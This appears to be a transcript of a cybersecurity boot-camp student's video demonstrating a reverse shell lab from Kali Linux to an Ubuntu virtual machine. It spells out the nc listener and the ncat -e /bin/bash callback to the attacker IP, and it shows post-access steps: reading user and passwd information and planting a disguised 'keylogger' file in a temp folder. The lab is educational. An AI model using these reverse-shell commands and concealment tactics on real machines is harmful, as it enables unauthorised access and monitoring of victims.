Well, I just learned something fun today in the boot camp. Figured I'd make a video to help out any classmates that are struggling with the process. We learned about reverse shell using Ncat in Kali Linux targeting an Ubuntu machine. So I'm loading up the virtual machine now. We're going to use Ncat, and the commands, some of them can be entered using NC, November Charlie, NC, or Ncat. Seems like the NC doesn't like the -E flag, so I think it seems maybe better to use Ncat, but on the attacking machine I'll use NC to set up a listener for the reverse shell, and then on the target machine I would set up a request out through Ncat to connect to my attacker IP. So what is a reverse shell? That's probably a great spot to start. Shell is, let's say you are on terminal in Linux or command line and you SSH into something, you've created a shell to get into SSH. Shell to me means basically some sort of command line access to a system, and that environment you're using is a shell of some sort. And a binding, a bind shell would be where you set up a connection to a target from your side, from the attacker side. The problem is for hackers that firewalls are generally set up to block that kind of thing. Firewalls are less set up to deny default outbound connection requests. So that's where reverse shell comes in, where you get into the target's computer and set up an outbound connection request in order to circumvent the firewall rules. Best practice is to default deny everything in your system, especially your organization. You want to utilize the principle of least privilege and add privilege when it is required. Don't give blanket open privileges and then learn the hard way that you need to reduce the amount of privileges that different machines have. How does somebody get into a target computer? Well, just today you've probably received on your phone or your email some sort of message that says you've got a USPS package that got lost, or you've got a toll due from a toll road you never visited, or your PayPal payments are messed up and you need to download this attachment attached to the email to fix it, to rectify it before you get all your money lost and the FBI comes to your house and all the time-sensitive crap they try to put on you. Once you download that link, or rather download that file or click that link in that fake text or email, you have basically given the hacker access to put malware onto your computer. That malware executes a command to then send an outbound request to their computer, and then effectively they've gained access. You are the target, they are the attacker, and if this ever heckin' loads, we'll get started on this mess. But for now, we can take a look, see if everything I just talked about is correct. One of the more common exploits in what is known as a shell. Let's see, exploits come in different types. Exploits reveal sensitive information. What else can you do with a reverse shell exploit? You can certainly steal data from their computer once you have command line access to their system. You could plant illegal data that they shouldn't have or that'll get them in trouble. You can set up an advanced persistent threat where you're just monitoring. Let's say you put a keylogger in once you get that shell access. And a shell is effectively a command line interface to the exploited system. A bind shell, specific port of the exploited system. A reverse shell is established when the exploited system connects to the attacker. Let's see, protocols over which reverse shells can reach your server: TCP, Transfer Control Protocol, HTTP port 80, HTTPS port 443. These are the common web ports, and then DNS, domain name service, I believe. Establishing a reverse shell requires knowledge of the system being exploited, and that's what you use your phishing attempt for. Or, you leave your laptop open at a cafe when you go to the restroom and some black hat hops over and runs a sudo ifconfig on your command line. They got your IP right there, bang, bang, boom, and they're connected to the same Wi-Fi as you. So that's how they might get in and establish that outbound connection from your machine. We're going to use Ncat. Oh, thank goodness. Let's see if it's there. It is. So let's get started. So this Ubuntu machine, let's pretend that's the laptop at the cafe that got left behind while someone was in the restroom. They're probably not using Linux, but that's okay. If it was Microsoft, we could figure out a different path with PowerShell or command prompt in there to do it. There is always a way. So let's open up terminal and grab their IP address. Right here, I'm going to note that down somewheres. All right, I could also ping my IP address from here if I knew it. That would help. Let's go ahead and do this real quick. The lazy way. Hey, Gemini. When I don't remember something and I don't feel like sifting through documentation, I do find that Gemini or ChatGPT is useful for quick reference items. Like this is setting up a listener on the attacker side. This is setting up the outbound connection on the exploited system. So we've got our IP. Let's hop over to Kali. Let's open this up. One thing we could do is run an nmap to see what ports are open if we want to get more specific. And let's not jump the gun here. We need our IP address still. I can't memorize that quickly. So we'll run an nmap on it. Double check our command. Running an nmap standard scan, and it's going to tell me the versioning as well. Learning versioning might be helpful to if they have an old updated version or an unupdated version of a platform. You could use then Metasploit to run an exploit on that particular version or something like that. So let's double check again. That looks good, so we'll run that just for funsies. Open up a new tab. We need to make sure we have Ncat installed. Let's see if a version request works. Ncat, help, please help. NC, I'm surprised, there we go. There we go, NC-H, NC for Netcat-H is the help flag, and that lets us know what version we have. So let's run LVP 444. That's going to open up a listener for any port. NC LVP 4444. And then we need to keep this tab open now that it's listening. So now we might want to have set up a cron job or something on the Ubuntu side so that once we get the listener set up, then it fires over. Either way, let's do ncat LVPN, I want to say. Oh, it's E. Idiot. E for idiot, am I right? E for idiot. We need to plug in my Kali IP. So let's go ahead and pull up another tab to grab my IP, sudo ifconfig. And 3146166, 3146166. Did I remember it? Did I do it? Sick. And then we need to do an E. I don't know what the E stands for, but I'll check that. I can't remember. Ncat. So NC does not like the E flag. Ncat seems to enjoy it. So we've got our listener open on the other end. Now we are, we need to set up a bin bash path. Yeah, E. So it's actually Ncat, then the IP, then the port, then E. So Ncat, IP, port, E, and then bin bash for the path. Press enter on that. Let's be confident without even reviewing it enough. And keep this open. And let's look at that open port SSH for the Nmap scan. And now listening has connected to the target from us to the target. So let's try some basic commands. If it wants to activate, there we go. ls, boom. It's not a very clean setup, but we can check a couple things. Let's see what user we are, labs user. Okay, let's try seeing the password information and then grep the lab. Ooh, that's terrible. Labs user. So they've got just bin bash shell access. I need to look up what these are. I think these are groups, maybe users and groups. Let's see what else we can do. So maybe we wanted to then get a keylogger set up on the system to basically become an advanced persistent threat, start monitoring the system, grabbing passwords and such. Let's switch to documents because we're still in the home directory. Nothing. Oh, I've already got it set up. So previously I had already created my exploits folder, but that wouldn't be very sneaky. Maybe we want to do something like that doesn't sound dangerous, like a temp folder or something that people are used to seeing. Okay. And then echo. Oh, I can't press over. Not used to that. This is a keylogger. And we'll put that into a temp log.txt or some sort of file. Now we've got a very unsuspicious looking file. It's actually a keylogger. So there we go. So what we've done is we've created a listener for any port on our attacker side. I might have specified port 22 over here since that one was open per Nmap. On this side, we either fished our way into the target system or got into their system when they walked away. So even as an employee, you should log out of your computer when you go away in the office, lest you find yourself with a nice David Hasselhoff background at the very least from one of your hilarious coworkers. Yes, I've shared too much. I've done that, and they paid me back tenfold. Won't get into it. Now, keep in mind, the E flag is not enjoyed by NC, but Ncat seems to enjoy the E. You're putting your IP, the attacker IP here, and then we're connecting the port to port and basically connecting to shell, which lives in the bin folder under bash. Look at that. We explored the system a little bit with ls. We found out our user with who am I. We got some extra information about the user. We could do env for a bunch of information about the user, the system they're using, paths they have set up, like games here. Maybe that's a bit of intelligence you could use to exploit through their game usage during work. You know, they get exploited through that, and they're like, I can't tell my boss I was playing games at work, so I guess I won't tell them about the exploit. So put your black hat on when you're thinking about protection. It's evil, I know. Good job out there. Any corrections? Any feedback that is positive and constructive, I will heed. Otherwise, I'll ignore it probably. Happy learning, y'all. Good job out there.